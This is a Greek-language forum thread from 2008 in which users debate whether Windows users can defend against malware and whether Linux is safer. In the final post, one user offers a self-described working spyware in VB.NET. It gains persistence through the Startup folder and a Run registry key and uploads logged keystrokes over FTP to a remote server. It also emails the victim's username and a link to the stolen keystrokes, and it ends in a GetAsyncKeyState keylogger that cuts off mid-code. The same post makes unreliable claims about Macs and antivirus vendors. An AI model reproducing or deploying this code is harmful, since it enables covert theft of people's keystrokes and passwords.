Nik0s Δημοσ. 29 Δεκεμβρίου 2008 Δημοσ. 29 Δεκεμβρίου 2008 Ρε παιδια πιστευω πως εμεις ειδκα οι windows users ειμαστε αβοηθητοι μπροστα στα malware. α) Τρεχουμε κατι σαν admin αν κολλησουμε κακοβουλο λογισμικο την βαψαμε. Αυτο θα εχει δικαιςματα διαχειριστη και θα μπορεσει να κανει shutdown ακομη και το firewall μας. β) Τρεχουμε κατι logged on ως standard(limited) user account? To κακοβουλο λογισμικο δεν θα μπορεσει *ισως* να τερματισει το firewall μας αλλα σιγουρα θα μπορει να το κοροιδεψει κανοντας inject τον εαυτο του σε ενα open session ενος trusted application και θα στελνει ανενοχλητο traffic απο κει χωρις το firewall να παιρνει χαμπαρι. LUA ξε-LUA δηλαδη παλι ζημια, χωρια που ισως να μπορει να κανει elevate τα privileges του απο diminished => full. c) Τα AVs και AntiSpywares' συνεχως ΔΕΝ θα μας προστατευουν επειδη θα κανουν κατα μεσο ορο 1,5 μηνες να αναγνωρισουν τα καινοθργια threats τα οποια εμεις θα εχουμε ηδη κολλησει και την ζημια θα την εχουμε ηδη παθει. δ) Βαζεις extra security products? Και δεν βοηθανε γιατι και αυτα ακομη μπορει το malware να τα τερματισει αλλα επισης ειναι επικυνδυνο να τα τρεχουμε γιατι ειναι φτιαγμενα και αυτα απο κωδικα και μπορουν καλλιστα να περιεχουν security vulnerabilites. Extra ρισκα δηλαδη για εμας. ε) Αν κλεισουμε τα ports μας, τοτε ναι υπαρχει ασφαλεια μαις που οι hackers ή τα κακοβουλα λογισμικα δεν εχουν points of access αλλα μετα δεν μπορουμε εμεις να κανουμε την δουελια μας γιατι οταν κλεινουμε ports ειναι σαν να κανουμε disbale καποια system services. Αν θελω web server πρεπει να εχω το πορτ 80 τουλαχιστον open για inbound connections αλλιως δεν μπορω να δεχτω συνδεσεις, αλλα απο την αλλη πλευρα το malware μια χαρα θα εκμεταλλευτει την ανοιγμενη απο εμενα 80 port. Ασε δηλαδη που κρυφα θα ανοιγει και τις δικες του. ΕΙΜΑΣΤΕ ΣΥΝΕΧΩΣ ΚΑΤΑΔΙΚΑΣΜΕΝΟΙ ΝΑ ΚΟΛΛΑΜΕ ΜΑΛ....ΕΣ.
alex2005 Δημοσ. 29 Δεκεμβρίου 2008 Δημοσ. 29 Δεκεμβρίου 2008 Αν είσαι τόσο απελπισμένος τότε ίσως τα Linux είναι μία λύση για εσένα. Και έχε τα windows σε άλλο partition για κανένα game....αν παίζεις. Εγώ πάντως χωρίς να ανησυχώ ιδιαίτερα δεν έχω παρατηρήσει ποτέ σοβαρά προβλήματα στο PC, απλά όταν βλέπω ότι έχει γεμίσει πολλές μαλακίες τότε του πετάω ένα format και ησυχάζω.....δεν θα σκάσω κιόλας.
Nik0s Δημοσ. 29 Δεκεμβρίου 2008 Μέλος Δημοσ. 29 Δεκεμβρίου 2008 Για καστε με τον ιδιο τροπο δεν μπρουν να κολλησουν και τα linuxoeidh δηλαδη οπως και τα freebsdoειδη?
Αδμιν Δημοσ. 29 Δεκεμβρίου 2008 Δημοσ. 29 Δεκεμβρίου 2008 Στο Linux και το xBSD το μονο που πρεπει να φοβασε ειναι τα exploits που ανακαλυπτονται κατα καιρους, αν και patchαρονται πολυ συντομα, ακομη και μερικες ωρες μετα τον εντοπισμο τους (ενα απο τα θετικα του open source software). Ιοι οπως τους ξερουμε στα Windows δεν υπαρχουν, λογω της αρχιτεκτονικης των Linux/xBSD. Σπανια θα αποκτησουν root access κακοβουλα προγραμματα χωρις να τους εχεις δωσει εσυ αυτο το access. Δεν ειναι ατρωτα, αλλα σιγουρα πολυ καλυτερα απο τα Windows στο τομεα της ασφαλειας.
oneofthem Δημοσ. 29 Δεκεμβρίου 2008 Δημοσ. 29 Δεκεμβρίου 2008 Ρε παιδια πιστευω πως εμεις ειδκα οι windows users ειμαστε αβοηθητοι μπροστα στα malware.ΕΙΜΑΣΤΕ ΣΥΝΕΧΩΣ ΚΑΤΑΔΙΚΑΣΜΕΝΟΙ ΝΑ ΚΟΛΛΑΜΕ ΜΑΛ....ΕΣ. κατά την άποψή μου, είναι σαν να λες ότι δεν υπάρχει προστασία αν πέσεις πάνω σε νάρκη όταν κόβεις βόλτες σε ναρκοπέδια και η απάντηση είναι να αποφεύγεις τα ναρκοπέδια για βόλτες αν δίνεις το email σου παντού και ότι email σου ρχεται το ανοίγεις (ναρκοπέδιο) έχεις δίκιο, τι προστασία να χεις εκεί (παράδειγμα φέρνω, δεν το λέω συγκεκριμένα για σένα) το δίκτυο έχει κινδύνους και για αυτό οι χρήστες πρέπει να προσέχουν τι κάνουν εγώ δεν χρησιμοποιώ antivirus και πιστεύω πως αν ακολουθείς μερικούς απλούς κανόνες δεν θα χεις κανένα πρόβλημα για να το κάνω πιο συγκεκριμένο η καλύτερη συμβουλή είναι να μάθεις λίγο καλύτερα πως διαδίδονται τα επικίνδυνα προγράμματα ώστε να τα αποφεύγεις, εάν δεν ξέρεις ότι διαδίδονται μέσω ορισμένων email ή μέσω ορισμένων ιστοσελίδων ή μέσω ορισμένων download, τότε είναι πολύ δύσκολο να προστατευτείς από κάτι που δεν γνωρίζεις αν ενημερωθείς όμως, δεν νομίζω πως είναι αδύνατη η ασφαλής περιήγηση στο internet χωρίς παράλληλα να περιοριστούν στο μηδέν οι δραστηριότητες χρόνια πολλά
Nik0s Δημοσ. 29 Δεκεμβρίου 2008 Μέλος Δημοσ. 29 Δεκεμβρίου 2008 Δεν το ξερα να αποφευγω τις ρωσικες σελιδες οι οποιες εχουν το καλυτερο warez μεσα. Αν δεν μπορουν να προστατευσουν τοτε τι τα εγκαθιστουεμ στο συστημα μας. αφου ειναι αχρηστα? Ουτε σκριπτ μπλοκερ ουτε τιποτα, εδω μιλαμε εχω δει malware να κλεινει το firewall aki to antivirus και να στελνει ανενοχλητο to traffic του. Αλλα και να μην μπορει να το kanei shutdown μπορει πολυ ευκολα να το ξεγελασει. Προστασιες για τα κλαματα εχουμε στα pc μας. Να πληρωνεις και να κολλας και απο πανω να περνις τηλ υποστηριξη Norton Antivirus και αν σου λενε με 100€ θα σου καθαρισουν ονλινε το συστημα το οποιο θα επρεπε να προστατευει εξαρχης το κωλοproduct τους. ΚΑΙ ΝΑΙ ΡΕ ΘΕΛΩ ΝΑ ΚΑΕΤΒΑΣΩ ΕΠΙΤΗΔΕS ΜΑLWARE ΝΑ ΠΡΟΣΠΑΘΩ ΝΑ ΤΟ ΤΡΕΞΩ ΚΑΝΟΝΑΤς ΔΙΛΠΟ ΚΛΙΚ ΠΑΝΩ ΤΟΥ ΚΑΙ ΤΟ ΓΑΜ.. ΤΟ av KAI TO fw NA TO PAIRNEI ΧΑΜΠΑΡΙ ΚΑΙ ΝΑ ΤΟ ΜΠΛΟΚΑΡΕΙ, ΑΛΛΙΩς ΤΙ ΠΡΟΣΤΑΣΙΑ ΚΑΙ ΜΛΚ...
dkoum Δημοσ. 29 Δεκεμβρίου 2008 Δημοσ. 29 Δεκεμβρίου 2008 αν θελεις να κατεβαζεις επιτιδες malware παντα θα κολλας !!!!! τα κακοβουλα προγραμματα ανανεονονται ποιο γρηγορα απο τα virus definitions και τα patch του λειτουργικου ο ΧΡΗΣΤΗΣ ειναι ΥΠΕΥΘΗΝΟΣ για να μην κολαει κακοβουλα προγραμματα δεν χρησημοποιω κανενα antivirus εδω και 4 χρονια απλα προσεχω που δινω το mail μου ,τι e-mail ανοιγω ,σε ποιες σελιδες μπαινω και τι κατεβαζω
oneofthem Δημοσ. 29 Δεκεμβρίου 2008 Δημοσ. 29 Δεκεμβρίου 2008 ... μαζί σου είμαι αλλά εντάξει και γω θέλω να είναι δωρεάν όλα τα προγράμματα και θέλω και μια ferrari αλλά δεν είναι ρεαλιστικά αυτά τα θέλω είναι σαν να μου λες πληρώνουμε το κράτος για την ασφάλεια των πολιτών >>> άρα >>> αν σταθώ στις γραμμές του τρένου ενώ αυτό έρχεται τότε πρέπει το κράτος να με προστατεύσει κάποια στιγμή πρέπει να μάθεις πως να χρησιμοποιείς το internet έτσι δεν είναι? εξάλλου διαβάσεις τα manual των anti*, (τουλάχιστον στα περισσότερα) το διευκρινίζουν αυτό, μη διαμαρτύρεσαι παράδειγμα για μικρά προγράμματα εγώ κατεβάζω το πρόγραμμα από το official site trial, πράγμα που σημαίνει ότι δεν χρειάζεται να το ελέγξω και τα υπόλοιπα στοιχεία (δεν αναφέρομαι γιατί δεν ξέρω αν επιτρέπεται από τους κανόνες του forum) τα βρίσκω από text και μόνο, γιατί το text δεν μπορεί να μεταφέρει τπτ έτσι δεν υπάρχει κανένα θέμα προστασίας, δεν είναι τόσο δύσκολο για μεγάλα αρχεία που ούτως ή άλλως δεν υπάρχει μεγάλος κίνδυνος πολύ απλά ακολουθώ τις αξιόπιστες πηγές αντί να μπαίνω τυχαία εδώ κι εκεί και να περιμένω από τα προγράμματα να με προστατεύσουν, μπαίνω μόνο "εκεί που μου λένε", εμπιστεύομαι μόνο τις πηγές που ξέρω ούτε αυτό είναι τόσο δύσκολο, απλά το μαθαίνεις με το καιρό να σου πω ότι και εγώ - παλιότερα βέβαια που τα anti* όχι δεν εξασφαλίζαν προστασία αλλά λειτουργούσαν κατά του συστήματος εντελώς - είχα έρθει στο ίδιο σημείο αναρωτιόμουν τι σκ... anti* είναι αν δεν κάνουν τπτ (παλιά δεν λειτουργούσε καθόλου η λειτουργία του fix την οποία έδιναν όμως) οπότε απλά προσαρμόστηκα και άρχισα να μαθαίνω τα πράγματα λίγο καλύτερα οπότε δυστυχώς δεν υπάρχει λύση/απάντηση σε αυτό που θες μάλλον, αναγκαστικά πρέπει να προσαρμοστείς στην πραγματικότητα και άμα θες σου προτείνω να στείλεις τα anti* από κει που ρθαν
Nik0s Δημοσ. 29 Δεκεμβρίου 2008 Μέλος Δημοσ. 29 Δεκεμβρίου 2008 εγω χερω που πρεπει να μπαινω και τι πρεπει να κατεβαζω και να ΜΗΒΝ κατεβαζω καθως και το τι πρεπει να τρεχω αλλα με βαρεια την καρδια διαπιστωνω πως στα windows οσο και να προσεχεις παλι την ζημια θα την παθεις. Ειναι κατι σαν τα σκατα τα οποια συνεχως μαζευουν μυγες γυρω τους9συγγνωμη για την αθυροστομια μου) υ.γ. Το παραδειγμα με το κρατος και τις γραμμες του τρενου μου αρεσε πολυ
gdp77 Δημοσ. 29 Δεκεμβρίου 2008 Δημοσ. 29 Δεκεμβρίου 2008 Για καστε με τον ιδιο τροπο δεν μπρουν να κολλησουν και τα linuxoeidh δηλαδη οπως και τα freebsdoειδη? Από τους 40 ιούς που έχουν αναφερθεί μέχρι σήμερα για Linux (υπενθυμίζω ότι αντίστοιχα στα win έχουμε μερικές εκατοντάδες χιλιάδες), ΚΑΝΕΝΑΣ δεν πέτυχε να αναπαραχθεί μαζικά και ΟΛΟΙ έμειναν στο εργαστήριο, όσο πεισματικά και αν προσπάθησαν ειδικοί ερευνητές να τους κάνουν να εξαπλωθούν πειραματικά. Εν κατακλείδι, φίλε nikos, σου εγγυώμαι ότι εγκαθιστώντας κάποια μοντέρνα linux διανομή, δεν κινδυνεύεις από τίποτα, ΟΠΟΙΟ τόπο και αν επισκεφτείς στο διαδίκτυο. Υ.Γ. Το γνωρίζω ότι ο mod που έχει avatar τη φάτσα του Αλ Μπάντι δεν επιτρέπει να μιλάμε για οτιδήποτε άλλο πλην win software σε αυτό το subforum. Ας με συγχωρέσει όμως, απλά απάντησα σε ερώτηση. ο ΧΡΗΣΤΗΣ ειναι ΥΠΕΥΘΗΝΟΣ για να μην κολαει κακοβουλα προγραμματα Εγώ διαφωνώ. Το OS είναι υπεύθυνο να προστατεύει το χρήστη. Δεν μπορούν όλοι οι χρήστες να γνωρίζουν για το κακόβουλο λογισμικό και πώς να το αποφύγουν. δεν χρησημοποιω κανενα antivirus εδω και 4 χρονια απλα προσεχω που δινω το mail μου ,τι e-mail ανοιγω ,σε ποιες σελιδες μπαινω και τι κατεβαζω Ούτε και εγώ χρησιμοποιώ antivirus, αλλά μπαίνω όπου θέλω χωρίς να ανησυχώ για τίποτα Να σου θυμίσω ότι υπάρχουν και ιοί που δε χρειάζεται να επισκεφτείς κάποιο τόπο για να κολλήσεις. Να σου θυμίσω το worm πριν κάποια χρόνια που έκανε shutdown τους υπολογιστές με win? Οι περισσότεροι το κόλλησαν από τους providers τους, με το που συνδέονταν on line. Win χωρίς antivirus είναι παιχνίδι με τη φωτιά, ειδικά αν έχεις στο δίσκο σου ευαίσθητα δεδομένα ή τη δουλειά σου. Τώρα, αν εσύ είσαι χομπίστας και δε σε νοιάζει να κάνεις και κανά format αν χρειαστεί, πάω πάσο. Μπορείς όμως να πεις σε οποιοδήποτε επαγγελματία να μείνει χωρίς A/V ?
Nik0s Δημοσ. 29 Δεκεμβρίου 2008 Μέλος Δημοσ. 29 Δεκεμβρίου 2008 ναι φιλε μου exw balei ubuntu εδς και 1 εβδομαδα, ασχετος δεν ειμαι αλλα ξερω μονο τα πολυ βασικα. Ποιο φορουμ θα μου προτεινες αποτα τοσα για να λυνω αποριες?(εγω θα ηθελα εδω μεσα να ρωταω αν εχουμε πολλους και δυαντους λυτες οπως που πιστευω πως εχουμε). Οσο για προστασια σε ερωτηση μου στο usenet γιατι ενω υπαρχει υπερπληθωρα fw kai avs το 95% των win μηχανηματων ειναι infected κοιτα τι μου απαντησε. Because people still: - work with admin privileges - provide services they don't actually want to provide - don't keep their software up-to-date - run software without even thinking about whether that may be a good idea or not (like, opening encrypted attachments from e-mails) Αρα παιδια αν εφαρμοζοντε ολα τα παραπανω σωστα δεν χρειαζοντε ουτε firewalls ουτε antivirus/antispyware ουτε τιποτα. αντιθετως ο χρηστης μπορει να χρησιμοποει monitoring tools οπως TCPView, Whireshark, Proccess Explorer για να διαπιστωνει σε καθημερινη βαση την ποιοτητα των διεργασιων του συστηματος του αλλα και το traffic που διακινειται. Αλλα βεβαια αυτο θελει προχωρημενες γνωσεις που ο απλος χρηστης δεν διαθετει. Ε ας κανει τα παραπανω τοτε Επισης ο διιο τυπος μου ειπε πως τα malware για windows ειναι over a million ενω για λινουξ +uνιξ μαζι 1000 περιπου τον αριθμο για τα οποια το 99,9% υπαρχουν patches για το host OS.
gdp77 Δημοσ. 29 Δεκεμβρίου 2008 Δημοσ. 29 Δεκεμβρίου 2008 Ποιο φορουμ θα μου προτεινες αποτα τοσα για να λυνω αποριες?(εγω θα ηθελα εδω μεσα να ρωταω αν εχουμε πολλους και δυαντους λυτες οπως που πιστευω πως εχουμε). Φυσικά το http://ubuntuforums.org/ και το linux subforum του insomnia!
Nik0s Δημοσ. 29 Δεκεμβρίου 2008 Μέλος Δημοσ. 29 Δεκεμβρίου 2008 Φυσικά το http://ubuntuforums.org/ και το linux subforum του insomnia! Τελεια! Θα σας τα κανω ΝΑ απο τις ερωτησεις! ;-) Just kidding υα διαβαζω κιολας. Βασικα προτιμω να ρωταω σε ΕΝΑ και ΚΑΛΟ φορουμ γιατι τις τελευταις 3 μερες εχω χασει την μπαλλα να ρωταω τα ιδια πραματα σε 3 ελληνικα φορουμς PLUS στο Usenet. Just 1 φορουμ plz! προσωπικα προτιμω εδω να τα λες με πατριωτες αλλα ομολοφω ομως οτι ορισμενοι ξενοι ειναι παρα πολυ εξιδικευμενοι.
NIXZ Δημοσ. 30 Δεκεμβρίου 2008 Δημοσ. 30 Δεκεμβρίου 2008 Ρε παιδια πιστευω πως εμεις ειδκα οι windows users ειμαστε αβοηθητοι μπροστα στα malware. α) Τρεχουμε κατι σαν admin αν κολλησουμε κακοβουλο λογισμικο την βαψαμε. Αυτο θα εχει δικαιςματα διαχειριστη και θα μπορεσει να κανει shutdown ακομη και το firewall μας. β) Τρεχουμε κατι logged on ως standard(limited) user account? To κακοβουλο λογισμικο δεν θα μπορεσει *ισως* να τερματισει το firewall μας αλλα σιγουρα θα μπορει να το κοροιδεψει κανοντας inject τον εαυτο του σε ενα open session ενος trusted application και θα στελνει ανενοχλητο traffic απο κει χωρις το firewall να παιρνει χαμπαρι. LUA ξε-LUA δηλαδη παλι ζημια, χωρια που ισως να μπορει να κανει elevate τα privileges του απο diminished => full. c) Τα AVs και AntiSpywares' συνεχως ΔΕΝ θα μας προστατευουν επειδη θα κανουν κατα μεσο ορο 1,5 μηνες να αναγνωρισουν τα καινοθργια threats τα οποια εμεις θα εχουμε ηδη κολλησει και την ζημια θα την εχουμε ηδη παθει. δ) Βαζεις extra security products? Και δεν βοηθανε γιατι και αυτα ακομη μπορει το malware να τα τερματισει αλλα επισης ειναι επικυνδυνο να τα τρεχουμε γιατι ειναι φτιαγμενα και αυτα απο κωδικα και μπορουν καλλιστα να περιεχουν security vulnerabilites. Extra ρισκα δηλαδη για εμας. ε) Αν κλεισουμε τα ports μας, τοτε ναι υπαρχει ασφαλεια μαις που οι hackers ή τα κακοβουλα λογισμικα δεν εχουν points of access αλλα μετα δεν μπορουμε εμεις να κανουμε την δουελια μας γιατι οταν κλεινουμε ports ειναι σαν να κανουμε disbale καποια system services. Αν θελω web server πρεπει να εχω το πορτ 80 τουλαχιστον open για inbound connections αλλιως δεν μπορω να δεχτω συνδεσεις, αλλα απο την αλλη πλευρα το malware μια χαρα θα εκμεταλλευτει την ανοιγμενη απο εμενα 80 port. Ασε δηλαδη που κρυφα θα ανοιγει και τις δικες του. ΕΙΜΑΣΤΕ ΣΥΝΕΧΩΣ ΚΑΤΑΔΙΚΑΣΜΕΝΟΙ ΝΑ ΚΟΛΛΑΜΕ ΜΑΛ....ΕΣ. ΔΕΝ ΥΠΑΡΧΕΙ ΚΑΜΙΑ ΑΠΟΛΥΤΟΣ ΠΡΟΣΤΑΣΙΑ ΕΝΑΝΤΙΑ ΣΕ ΜΙΑ ΟΡΓΑΝΩΜΕΝΗ ΕΠΙΘΕΣΗ a+ Γενικά τα Windows δουλεύουν με τέτοιο τρόπο που η αλλάγες στα Privileges ενώς χρήστη είναι εφικτές in just one line of code. Έτσι είναι πανεύκολο να φτιάξεις δικά σου προγράμματα αντίθετα με τα Mac που δεν σου αποκαλύπτουν τίποτα για τον τρόπο λειτουργίας τους (κάνοντας αδύνατη την δημιουργία ενώς ιού) για 'υτό τα Windows κατέχουν το 90% σε Operating Systems (OS). c+d) Αναγνωρίζουν already known attacks + κομμάτια κόδικα που είναι προφανώς malicious nothing complicated αφου οι ίδιες εταιρίες που φτιάχνουν τα Spyware και Anti-Malware πειραματίζονται φτιάχνοντας ιους . Είναι σαν να ψεκάζεις τον αέρα με αρρώστιες και να πουλάς αντιβιοτικά. e) Πως να φτιάξεις ένα 100% Working Spyware: Σύνδεση ανάμεσα στα δυο PC χρησιμοποιώντας έναν FTP Server: MASTER PC <--> FTP SERVER <--> VICTIM PC έτσι επιτυνχάνεις την ανταλλαγή πληροφοριών no-probs εκτός και αν θες έναν απλο keylogger οπότε χρησιμοποιείς το send email function. SPYWARE IN VB.NET BY NIXZ [FORM1-FTPMANAGER]: >Imports System.IO Imports System.Net Imports System.Net.Mail Public Class Form1 'Member Info Private MemberUsername = "WebMaster" Private MemberEmail = "[email protected]" 'Servers Info Private StandardHttpServerMain = "http://restricted.com/" Private FtpServerHash As String = "ftp://restricted.com/" Private HttpServerHash As String = "http://restricted.com/" Private FtpUsername As String = "restricted.com" Private FtpPassword As String = "12345" 'File and Folders Declaration Private MainFolder As String = "C:\Temp" Private ExeFile As String = "C:\Temp\asvdsadfgv.exe" Private KeysFile As String = "C:\Temp\6b657973.dat" Private ServerFile As String = "C:\Temp\73657276657273.dat" 'Public Variables declaration Private Hash = String.Empty Private Mail As Net.Mail.MailMessage Private Server As Net.Mail.SmtpClient Private UserLogin As NetworkCredential Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load On Error Resume Next 'Prevent Confusion If Process.GetProcessesByName(System.IO.Path.GetFileNameWithoutExtension(Process.GetCurrentProcess.MainModule.ModuleName)).Length > 1 Then Me.Close() End If 'Modify Registry If Not System.IO.File.Exists((Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Update.exe")) Then System.IO.File.Copy(ExeFile, Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Update.exe") My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Windows", ExeFile, Microsoft.Win32.RegistryValueKind.String) End If 'Check for Installation If Not System.IO.Directory.Exists(MainFolder) Then System.IO.Directory.CreateDirectory(MainFolder) End If 'Get Hash For Each Chr As Char In My.User.Name.ToString.ToLower If Chr = "a" Or Chr = "b" Or Chr = "c" Or Chr = "d" Or Chr = "e" Or Chr = "f" Or Chr = "g" Or Chr = "h" Or Chr = "i" Or Chr = "j" Or Chr = "k" Or Chr = "l" Or Chr = "m" Or Chr = "n" Or Chr = "o" Or Chr = "p" Or Chr = "q" Or Chr = "r" Or Chr = "s" Or Chr = "t" Or Chr = "u" Or Chr = "v" Or Chr = "w" Or Chr = "x" Or Chr = "y" Or Chr = "z" Then Hash &= Chr End If Next 'Download ServerFile If System.IO.File.Exists(ServerFile) Then System.IO.File.Delete(ServerFile) End If My.Computer.Network.DownloadFile(StandardHttpServerMain & "Server.dat", ServerFile) 'Read ServerFile Dim ReadServerInfoFile As New StreamReader(ServerFile) FtpServerHash = ReadServerInfoFile.ReadLine HttpServerHash = ReadServerInfoFile.ReadLine FtpUsername = ReadServerInfoFile.ReadLine FtpPassword = ReadServerInfoFile.ReadLine ReadServerInfoFile.Close() 'Delete ServerFile If System.IO.File.Exists(ServerFile) Then System.IO.File.Delete(ServerFile) End If 'Save Keys on Server Dim FTPRequest2 As System.Net.FtpWebRequest = DirectCast(System.Net.WebRequest.Create(FtpServerHash & MemberUsername & "/" & Hash & ".txt"), System.Net.FtpWebRequest) FTPRequest2.Credentials = New System.Net.NetworkCredential(FtpUsername, FtpPassword) FTPRequest2.Method = System.Net.WebRequestMethods.Ftp.UploadFile Dim File2() As Byte = System.IO.File.ReadAllBytes(KeysFile) Dim FTPStream2 As System.IO.Stream = FTPRequest2.GetRequestStream() FTPStream2.Write(File2, 0, File2.Length) FTPStream2.Close() FTPStream2.Dispose() 'Send Email Mail = New Net.Mail.MailMessage("[email protected]", MemberEmail) With Mail .Subject = "Mail " & "( " & My.User.Name & " )" .Body = "Link: " & HttpServerHash & MemberUsername & "/" & Hash & ".txt" .IsBodyHtml = False .Priority = MailPriority.High End With Server = New Net.Mail.SmtpClient("smtp.gmail.com", "587") Server.EnableSsl = True UserLogin = New Net.NetworkCredential("ASDFASD", "ASDFASF") Server.Credentials = UserLogin Server.Send(Mail) Mail.Dispose() 'Start Keylogger Form2.Show() End Sub Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick On Error Resume Next 'Modify Registry If Not System.IO.File.Exists((Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Update.exe")) Then System.IO.File.Copy(ExeFile, Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Update.exe") My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Windows Services", ExeFile, Microsoft.Win32.RegistryValueKind.String) End If 'Check for Installation If Not System.IO.Directory.Exists(MainFolder) Then System.IO.Directory.CreateDirectory(MainFolder) End If 'Get Hash For Each Chr As Char In My.User.Name.ToString.ToLower If Chr = "a" Or Chr = "b" Or Chr = "c" Or Chr = "d" Or Chr = "e" Or Chr = "f" Or Chr = "g" Or Chr = "h" Or Chr = "i" Or Chr = "j" Or Chr = "k" Or Chr = "l" Or Chr = "m" Or Chr = "n" Or Chr = "o" Or Chr = "p" Or Chr = "q" Or Chr = "r" Or Chr = "s" Or Chr = "t" Or Chr = "u" Or Chr = "v" Or Chr = "w" Or Chr = "x" Or Chr = "y" Or Chr = "z" Then Hash &= Chr End If Next 'Download ServerFile If System.IO.File.Exists(ServerFile) Then System.IO.File.Delete(ServerFile) End If My.Computer.Network.DownloadFile(StandardHttpServerMain & "Server.dat", ServerFile) 'Read ServerFile Dim ReadServerInfoFile As New StreamReader(ServerFile) FtpServerHash = ReadServerInfoFile.ReadLine HttpServerHash = ReadServerInfoFile.ReadLine FtpUsername = ReadServerInfoFile.ReadLine FtpPassword = ReadServerInfoFile.ReadLine ReadServerInfoFile.Close() 'Delete ServerFile If System.IO.File.Exists(ServerFile) Then System.IO.File.Delete(ServerFile) End If 'Download KeysFile If System.IO.File.Exists(KeysFile) Then System.IO.File.Delete(KeysFile) End If My.Computer.Network.DownloadFile(HttpServerHash & MemberUsername & "/" & Hash & ".txt", KeysFile) 'Read KeysFile Dim ReadKeysFile As New StreamReader(KeysFile) Dim Keys = ReadKeysFile.ReadToEnd ReadKeysFile.Close() 'Save KeysFile Dim WriteKeysFile2 As New StreamWriter(KeysFile) WriteKeysFile2.Write(Keys) WriteKeysFile2.Close() 'Save Keys on Server Dim FTPRequest2 As System.Net.FtpWebRequest = DirectCast(System.Net.WebRequest.Create(FtpServerHash & MemberUsername & "/" & Hash & ".txt"), System.Net.FtpWebRequest) FTPRequest2.Credentials = New System.Net.NetworkCredential(FtpUsername, FtpPassword) FTPRequest2.Method = System.Net.WebRequestMethods.Ftp.UploadFile Dim File2() As Byte = System.IO.File.ReadAllBytes(KeysFile) Dim FTPStream2 As System.IO.Stream = FTPRequest2.GetRequestStream() FTPStream2.Write(File2, 0, File2.Length) FTPStream2.Close() FTPStream2.Dispose() End Sub End Class [FORM2-KEYLOGGER]: >Public Class Form2 Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Short Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Integer) As Short Public Function getCapslock() As Boolean getCapslock = CBool(GetKeyState(System.Windows.Forms.Keys.Capital) And 1) End Function Public Function getShift() As Boolean getShift = CBool(GetAsyncKeyState(System.Windows.Forms.Keys.ShiftKey)) End Function Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick On Error Resume Next 'My KeyLogger Dim i As Object Dim Pressed As Object Dim LineLimit As Int32 = 69 Dim Key As Object On Error Resume Next Pressed = GetAsyncKeyState(13) If Pressed = -32767 Then Key = "[EN]" GoTo KeyFound End If Pressed = GetAsyncKeyState(8) If Pressed = -32767 Then Key = "[bS]" GoTo KeyFound End If Pressed = GetAsyncKeyState(32) If Pressed = -32767 Then Key = " " GoTo KeyFound End If Pressed = GetAsyncKeyState(186) If Pressed = -32767 Then If getShift() = False Then Key = ";" Else Key = ":" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(187) If Pressed = -32767 Then If getShift() = False Then Key = "=" Else Key = "+" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(188) If Pressed = -32767 Then If getShift() = False Then Key = "," Else Key = "<" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(189) If Pressed = -32767 Then If getShift() = False Then Key = "-" Else Key = "_" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(190) If Pressed = -32767 Then If getShift() = False Then Key = "." Else Key = ">" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(191) If Pressed = -32767 Then If getShift() = False Then Key = "/" Else Key = "?" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(192) If Pressed = -32767 Then If getShift() = False Then Key = "`" Else Key = "~" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(96) If Pressed = -32767 Then If getShift() = False Then Key = "0" Else Key = ")" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(97) If Pressed = -32767 Then If getShift() = False Then Key = "1" Else Key = "!" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(98) If Pressed = -32767 Then If getShift() = False Then Key = "2" Else Key = "@" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(99) If Pressed = -32767 Then If getShift() = False Then Key = "3" Else Key = "#" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(100) If Pressed = -32767 Then If getShift() = False Then Key = "4" Else Key = "$" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(101) If Pressed = -32767 Then If getShift() = False Then Key = "5" Else Key = "%" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(102) If Pressed = -32767 Then If getShift() = False Then Key = "6" Else Key = "7" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(103) If Pressed = -32767 Then If getShift() = False Then Key = "7" Else Key = "&" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(104) If Pressed = -32767 Then If getShift() = False Then Key = "8" Else Key = "*" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(105) If Pressed = -32767 Then If getShift() = False Then Key = "9" Else Key = "(" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(106) If Pressed = -32767 Then If getShift() = False Then Key = "*" Else Key = "" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(107) If Pressed = -32767 Then If getShift() = False Then Key = "+" Else Key = "=" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(108) If Pressed = -32767 Then Key = "" GoTo KeyFound End If Pressed = GetAsyncKeyState(109) If Pressed = -32767 Then If getShift() = False Then Key = "-" Else Key = "_" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(110) If Pressed = -32767 Then If getShift() = False Then Key = "." Else Key = ">" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(111) If Pressed = -32767 Then Key = "/" GoTo KeyFound End If Pressed = GetAsyncKeyState(2) If Pressed = -32767 Then If getShift() = False Then Key = "/" Else Key = "?" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(220) If Pressed = -32767 Then If getShift() = False Then Key = "\" Else Key = "|" End If GoTo KeyFound End If Pressed = GetAsyncKeyState(222) If Pressed = -32767 Then If getShift() = False Then Key = "'" Else Key = Chr(34) End If GoTo KeyFound End If Pressed = 